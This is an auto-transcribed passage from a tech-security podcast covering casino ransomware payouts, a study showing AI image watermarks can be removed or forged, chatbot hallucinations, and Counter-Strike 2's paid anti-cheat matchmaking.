because it's like a hostage negotiation, essentially.

37:04

And it's like, do you pay the terrorists? Totally.

37:08

It's like if you become like

37:11

Caesar, so here's the thing, like my

37:13

wife listened to the episode we talked about Vegas and

37:15

was like, hey, you know, Caesar's

37:18

paid it and was back up and running, MGM

37:20

didn't, why didn't they just pay it? And it's like,

37:22

well, it's tough.

37:26

It's tough. It cost

37:28

them $100 million in like cost

37:30

revenues and stuff. So it's not, I'm sure the

37:32

ransom was less, but at the same

37:34

time, once you become

37:37

known as the organization that pays, do

37:40

you open yourself up to more tax? I would

37:42

say yes. Mm-hmm. Like

37:44

it's not gonna be the last time this happens.

37:47

No, definitely not. And

37:49

I feel like Vegas of all places

37:51

would have a lot of like, I don't know, they

37:53

put a lot of thought into how you deal with a

37:56

criminal messing with your system, like

37:58

whether it's on the casino for that. type criminals

38:00

like no there's the old Vegas

38:02

way this shit is done and I'm

38:05

not saying that's what happened there but feels

38:07

like I don't know it kind of reminded me of that

38:09

yeah yeah if Vegas was

38:12

not a publicly or conglomeration

38:14

of publicly traded companies these days it

38:17

was still back in the old days and it was mostly

38:19

allegedly mafia run I'm sure this

38:21

would be resolved in a much different way yeah

38:25

I mean if you're gonna go after you're

38:27

gonna go by the mafia and I'm

38:30

I am making no claims about MGM I'm sure

38:32

that is a different time yeah

38:35

but you know what I probably want to do it from behind a keyboard yeah

38:38

yeah I said allegedly we

38:42

need to just print allegedly on the like

38:44

box art of this show like we're

38:47

speculating wildly we

38:50

try to be informed calculating wildly

38:52

where we are out-of-pocket on hack

38:56

which now

38:58

does that be good yeah exactly all

39:01

of them all of them okay

39:04

so we mentioned this a little bit at the top of the show but

39:07

when generative AI first started kind

39:09

of kicking around people

39:11

started talking about people started exploring

39:13

okay well it is the downside of this giant

39:15

earth shattering new technology and

39:18

along with the impact it's inevitably

39:20

gonna have on the creator economy there's

39:23

the question of misinformation both

39:26

of which people start positing that watermarking

39:28

could be a very useful technique

39:32

the ability to run an image or piece

39:34

of text through something and try

39:36

and quickly figure out you

39:38

know just like a checkmark this was or was

39:40

not generated by a major AI companies

39:42

open AI alphabet meta Amazon and

39:45

they immediately said we are committing to developing watermarking

39:47

technology to counter misinformation it was

39:49

the sort of thing that was gestured towards whenever

39:52

that

39:54

whenever that very present threat was brought

39:56

up the

39:57

rules deep-mind introduced a sort of beta version of

39:59

its watermark since ID in late

40:01

August. It's sort of the answer

40:04

that comes up a lot when people raise

40:06

those very, very important questions. We

40:09

are talking about it because of a really fascinating

40:12

piece in Wired that dropped about a computer

40:14

science professor at the University of Maryland,

40:16

Sohail Faizi, who after

40:19

this long research project

40:21

over the last six months, stated that there is

40:24

currently no reliable watermarking

40:26

for AI images currently used. He

40:28

and his small team were able to break all types

40:31

of AI watermarking that they tested.

40:34

Thought this was probably worth talking about.

40:37

So there's two different types of watermarking, right? There's

40:39

the watermarking that's visible to

40:41

the naked eye, you know, a watermark in the corner,

40:43

you can think of the Getty Images type thing. It's

40:45

also funny in the context of AI. The

40:48

other type, I didn't know this phrase, it's called

40:50

low perturbation. And

40:52

that basically just means it's invisible to the naked

40:54

eye. Yeah. So he was testing

40:56

specifically these low perturbation of watermarks

40:59

that would allow a user to quickly check

41:01

an image for whether or not

41:03

it was generated by AI. And I'm just gonna

41:06

quote him here. The results of his study, he

41:08

deemed them to have, quote, no

41:10

hope. He was, him

41:13

and his team were able to, the phrase is washing

41:15

out the watermark. And it was exceptionally

41:18

easy. He also, I found this

41:20

interesting, demonstrated how pretty

41:22

simple it was for those same watermarks to

41:24

then be added to human generated

41:26

images, leading to false positives. So

41:29

it's not just that the current state of

41:31

these watermarks is like crackable.

41:35

It's, it maybe suggests that

41:37

the very concept of an

41:39

easy to apply watermark that

41:41

is not visible to the naked eye could then

41:44

be misused to create these false

41:46

positives that render it even less useful

41:48

in the first place. But my

41:51

mind immediately goes to, I feel

41:53

like you could train an AI

41:55

to detect and remove these

41:58

AI generated patterns. A

42:01

little bit, yeah. Like you get a big training

42:03

set of AI images that have the watermarks and

42:05

a big training set of images that don't have the watermarks.

42:08

You feed it in and then train

42:10

it up and be like, okay, here's

42:12

the watermark image. Is this image watermark?

42:14

Yes, remove the watermark. Yeah, generate.

42:18

I feel like AI would be great at doing

42:20

that. Yeah, your solution

42:22

to AI just happens to be the kind of thing that AI

42:25

would be really, really great at undoing is

42:27

sort of a bad situation

42:29

to find yourself in. This, yeah,

42:32

it raises this

42:35

question of, this isn't the only

42:37

one of these studies that's going on. Pretty much the

42:39

second we realized we were entering a like era

42:41

of watermarking being really important,

42:44

a bunch of different studies kicked off. There's the University

42:46

of California one, the Santa Barbara, Carnegie

42:48

Mellon. They have all

42:50

found very similar things to SoHills study,

42:53

which is that these are susceptible. The

42:56

interesting idea here is that I think maybe

42:58

these just, we started thinking of these not

43:00

as like a silver bullet and as a small

43:03

part of a much broader

43:06

way of addressing misinformation

43:08

and copyright that are invited by this new technology.

43:12

It's sort of like a means of harm

43:15

reduction against the really, really

43:17

low effort AI

43:19

fakery. You could imagine a super,

43:23

it's not the kind of thing you'd want to trust for everything, but like

43:25

a filter almost on a social

43:27

media platform or an email

43:29

client that is just parsing for the really,

43:32

really low effort stuff, but

43:34

that you shouldn't be relying on

43:36

as like a real true test of whether or not something

43:38

was authored by a human. I remember

43:40

when chat GPT first came out, there were tons

43:43

of teachers running chat GPT

43:45

essays through, especially these

43:47

tools that came out within days of chat GPT

43:49

that were tasked with checking whether or

43:51

not it was AI generated. We all kind of quickly

43:53

had this reckoning that like, this

43:56

is not, put this tech

43:58

back in the oven, it's not ready yet. But

44:01

it's the same as the traditional

44:03

watermark, right? It's essentially a road

44:05

bump. If you wanna get rid of it, you can. That's

44:08

a great point. Like Adobe

44:11

Photoshop's Smart Fill probably gets

44:13

rid of most of them. 100% of those. And

44:16

it's, exactly. But it's essentially,

44:20

you have to cognitively take the step to

44:22

violate the copyright. And

44:25

I guess that's probably the biggest

44:27

checkbox for it, being able to show

44:29

that people actively did do something to bypass

44:31

the copyright when you do find them. The

44:34

idea of having some form of, like

44:37

images or pixels, right? Like they're just data

44:39

points. Literally just a grid of data

44:41

points. Run through

44:43

compression algorithms and a bunch of other things, depending

44:46

on what type they are. But trying

44:50

to put something into a grid of data points that

44:52

can't be either A detected or B removed

44:55

is very hard. If

44:57

you know what you're looking for, very easy. So

45:02

yeah, it's gonna

45:04

be a real tough one. Unless they're also

45:06

hashing the file and providing the like,

45:09

check some for the file and you have to validate

45:11

that the file has been modified, then

45:14

it's very, very tough. Yeah,

45:17

because I have such a deep disrespect

45:19

for my own time, I end up watching a lot

45:21

of tech announcements and public

45:24

press events and stuff. And

45:26

I'm always intrigued by like the recurring narratives

45:29

that occur when companies

45:31

have to announce new technology, let's call it.

45:33

And I'm

45:35

intrigued to see, I

45:37

imagine there's a lot of pitch decks and

45:39

public presentations that are sitting

45:42

in like private drives right now that

45:44

spend a lot of time talking about security and

45:46

artificial intelligence. And I would imagine that if

45:48

I could do a search for the term watermarking, it

45:50

would come up a lot. And I'm very

45:52

intrigued. The thing I wanted

45:55

to take away from the story is like almost like loading

45:57

it into my brain so that the next time I

45:59

see a big. a big company talking about watermarking

46:05

and how watermarking with AI will only make this more

46:07

secure, or

46:10

will make misinformation harder, not to necessarily say, well,

46:15

that's just a lie outright. I

46:18

don't think it's that, but to sort

46:20

of carry a little bit more skepticism

46:23

about that as we continue to wade into this AI generative

46:25

art era. I

46:28

think there are a lot of slide decks full of artificially intelligent, or

46:33

AI generated images and AI generated copy. Maybe

46:38

even in the same slide deck. Every

46:42

pitch deck I've seen in the last year has

46:44

had some form of AI-generated

46:47

images in it and some form of copy that's been accelerated, edited, or

46:49

entirely generated via AI. I

46:55

think we're there with Microsoft. I

47:00

know Microsoft is looking at building, I'm

47:03

not even looking at it as actively if not

47:06

getting ready to deploy. Maybe it has

47:08

deployed and I don't use Microsoft Office enough,

47:11

but they are generating essentially an assistant inside

47:13

of Office that will fast-track

47:15

tons of things for you, whether

47:18

it's writing an email and Outlook, editing something

47:21

in Word, maybe even

47:24

smart figuring out what your spreadsheet design

47:26

is looking to do and then just finishing it

47:28

for you. I think

47:31

it's going to be, we're there. I

47:35

think it's going to be good, but there's

47:37

going to be bad things too, just like everything. If

47:39

you look at this entire podcast, it's

47:41

because we have technology and technology I

47:43

think is largely seen as good, but

47:45

there's some bad there too. Oh, definitely. I

47:50

think you were right about all of that. I'm very intrigued

47:52

to see what the next. I think

47:54

I'm fascinated to see as

47:58

it gets baked more into the world. of the stuff we're already using.

48:01

I've become a chat GPE user

48:03

for a bunch of different things, but

48:05

I think for a lot of people, it being woven

48:07

into the places they're already being productive,

48:10

Google Docs, Microsoft

48:12

Office, that's gonna be when it either

48:15

does or doesn't become a big part of people's habits. Because

48:18

this is one of the first pieces of technology where I'm realizing

48:20

that, I don't know,

48:22

the little bit of a bubble that I'm in when it comes

48:25

to new technology. I have friends who like

48:27

tech, I like tech. We do a

48:29

tech show. And

48:31

in my mind, chat GPT showed up, mid-journey

48:33

showed up, and I'm like, all anyone's gonna be using

48:35

in six months. And over six months have passed,

48:38

and a lot of people in my life are not regularly

48:40

using these tools. Like, okay. There

48:44

are different threads of

48:47

tech users, and being

48:49

cognizant of that is something that, I don't know, it's

48:52

been a really fascinating process watching a big,

48:54

big tech shift happen and realizing that it's

48:57

not all happening at once. I

49:00

was sitting in a friend's backyard a month

49:03

ago. We were having a beer, and

49:06

their brother showed up, and their brother's

49:09

fiance. And she was in university

49:11

now, still in university, she's doing a master's

49:14

or something. And she was

49:18

talking about how she uses it to summarize her readings.

49:21

Like you just copy in digital

49:23

text. So she's gotta read 200

49:26

pages a week or something. She just

49:28

dumps it into chat dbt. Summarize

49:30

this for me. And bang,

49:33

out comes three or four

49:35

pages of

49:38

everything that you need to take away from it. It's

49:40

like, wow, that's a use

49:42

case. Oh yeah,

49:45

it's funny. I

49:47

thought I figured out was a total tangent.

49:51

We talked about AI hallucinations a little while back,

49:53

and those are particularly bad when you're asking

49:55

it questions that it's trying

49:58

to derive the answer from its own internal data. like

50:01

if you ask it about a law or

50:03

a health situation or anything like that, it might

50:05

just make things up. And I'd

50:07

started to feel like I had sort of found the workaround

50:10

to that, which is that always provide it your own

50:12

data set. Always be bringing in

50:14

your own information and saying I want

50:16

you to work off of this. Beyond

50:19

just the ability to quickly look back up at the data

50:21

and make sure something is accurate, I also just found

50:23

it got much better results. I got

50:25

my first full blown hallucination

50:28

using that technique. It was kind of

50:30

spooky to me. I was looking at

50:32

it writing full

50:34

on the wrong thing. It was just going on

50:36

a total fantasy, unrelated

50:39

to the text I had just provided it. It was really

50:42

weird to watch. Because

50:45

Chat GPT doesn't just sit there with a

50:47

loading bar and then show you the presented text,

50:49

you get to watch it type. There

50:51

was something so creepy about watching it just

50:54

sort of wax fantastical and make crap

50:57

up. I just read what I

50:59

gave you. I'm

51:01

just asking you to synthesize it into notes

51:03

so I can remember it later. What

51:05

is any of this? So

51:07

I want to just keep banging the robots, the

51:13

robots dream of electric sheep. They're making shit

51:15

up still. Don't trust it

51:17

yet. Use it. It's a powerful

51:20

tool. But if there was a calculator that

51:22

just got five plus five equals

51:24

nine sometimes, you'd be very cautious

51:26

using that calculator. Hey,

51:31

I know we're wrapping up here and just kind of

51:33

shooting it. So here's a good

51:35

one. Remember when we were talking about video

51:37

game hackers and free to play games

51:39

and how they're overrun with video game hackers? So

51:42

Counter Strike 2 released. The

51:45

new version of Counter Strike came out and

51:48

they have essentially instituted kind

51:50

of what I said. They

51:52

put in a Prime status upgrade. So for like

51:54

an additional like $20, you

51:57

become a Prime player and Prime players.

52:00

play with other prime players. So

52:02

essentially, essentially

52:05

they've, they've created a situation where you've

52:07

essentially paid a cheating bond. You

52:09

get a few other little perks with it, but at

52:11

the end of the day, the biggest

52:13

change is that prime players get matched

52:16

with other prime players and because you've paid

52:18

for it now, there's a good chance you're not going to cheat.

52:21

So it's, it's a cheating bond. Anyway,

52:23

I just thought it was cool as a, as an

52:25

old school counter-strike player. I remember that idea

52:28

that you had. Yeah. You, yeah. Cheating

52:30

bond. That's a really good way of putting it. Is counter-strike two out

52:32

or is that no counter-strike two?

52:34

It's been out for ever or

52:37

like a long time, right? Uh, well,

52:40

yeah, yeah. But they just did a full rebuild

52:43

of it. Like I think it was a few weeks ago, two, three

52:45

weeks ago, the new, new, that new, new

52:47

full CS go went away and counter-strike

52:49

two came out. Oh, okay. Cause

52:51

I was like, I thought, I thought it came out in 2012 and

52:53

then I'm seeing 2023. I was confused.

52:57

That's fascinating. I think that that makes

52:59

a ton of sense. Yeah. It's a game that's

53:01

had valve anti-cheat, like valve anti-cheat

53:03

was created for counter-strike essentially. And

53:06

it's, it's got a very active anti-cheat,

53:08

but there's still people that cheat and hack in it. So,

53:11

so this is just a way to get around that. You

53:13

know, so many of these free to play games are just overrun

53:15

with hackers and cheaters that, you

53:17

know, Hey, you love this game.

53:19

Do you love it enough to pay 20 bucks not

53:21

to get frustrated every time you die to a cheater? I

53:24

was like, yeah, I do. Huh.

53:26

Interesting. So, Huh. Yeah.

53:30

Bring it up. Um, hotlinehacked.com.

53:33

Make sure you go to it. Final ring of the bell, Scott.

53:35

Hotline Hacked. What is it? Where do they go? What should

53:37

they do? Go hotlinehacked.com.

53:42

You want to call the number

53:44

and leave us a message and please

53:47

don't use this just to send us weird things. Yeah.

53:49

Nothing. goes to

53:51

an anonymized email box

53:53

that we're going to go through. Uh, please don't

53:55

send us malware. Alf. We're super

53:57

sorry. We don't know how to pronounce your name. Please don't

54:00

I'm going to use this as an attack vector. Yeah,

54:06

send us some stuff if you're interested, if you've got a good

54:08

story, if you've done something, or if

54:10

you've seen something, or if you allegedly know

54:13

of something, we'd love to hear about

54:15

it. And if we think it's

54:17

good, then maybe it'll be in an episode

54:19

coming up. Stoked to hear from you. Thanks

54:22

for listening to another one. Thanks for making it to the end. And

54:24

we'll catch you soon. We'll catch you on Halloween

54:26

with a very fun episode of

54:28

Halloween Hacked. Oh yeah, special guest.

54:31

Special guest. Special guest. Looking forward

54:33

to it. Catch you in the

54:35

next one. Take care. When it

54:37

comes to personal style,

54:53

it's all

54:55

about layers, especially now. Add

54:57

layers to your fall style with new colors,

55:00

fabrics, and styles from Indochino. Go

55:02

to Indochino.com and use code PODCAST

55:05

to get 10% off any purchase, $3.99 or more.

Unlock more with Podchaser Pro

  • Audience Insights
  • Contact Information
  • Demographics
  • Charts
  • Sponsor History
  • and More!
Pro Features